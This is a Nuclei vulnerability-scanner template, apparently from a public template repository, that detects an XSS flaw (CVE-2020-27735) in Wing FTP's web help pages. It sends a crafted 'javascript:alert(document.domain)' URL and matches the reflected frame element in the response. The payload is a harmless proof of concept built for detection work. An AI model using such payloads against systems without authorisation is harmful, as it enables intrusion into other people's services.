nuclei-templates/cves/2020/CVE-2020-27735.yaml

32 lines
888 B
YAML
Raw Normal View History

2021-07-27 03:23:23 +00:00
id: CVE-2020-27735
info:
name: Wing FTP's Web Interface XSS
author: pikpikcu
severity: medium
description: |
An XSS issue was discovered in Wing FTP 6.4.4. An arbitrary IFRAME element can be included in the help pages via a crafted link, leading to the execution of (sandboxed) arbitrary HTML and JavaScript in the user's browser.
reference: https://nvd.nist.gov/vuln/detail/CVE-2020-27735
tags: cve,cve2020,xss,wing-ftp
requests:
- method: GET
path:
2021-07-27 11:02:50 +00:00
- "{{BaseURL}}/help/english/index.html?javascript:alert(document.domain)"
2021-07-27 03:23:23 +00:00
matchers-condition: and
matchers:
- type: word
words:
2021-07-27 11:02:50 +00:00
- '<frame name="hmcontent" src="javascript:alert(document.domain)" title="Content frame">'
2021-07-27 03:23:23 +00:00
part: body
- type: status
status:
- 200
2021-07-27 05:11:08 +00:00
- type: word
part: header
words:
- text/html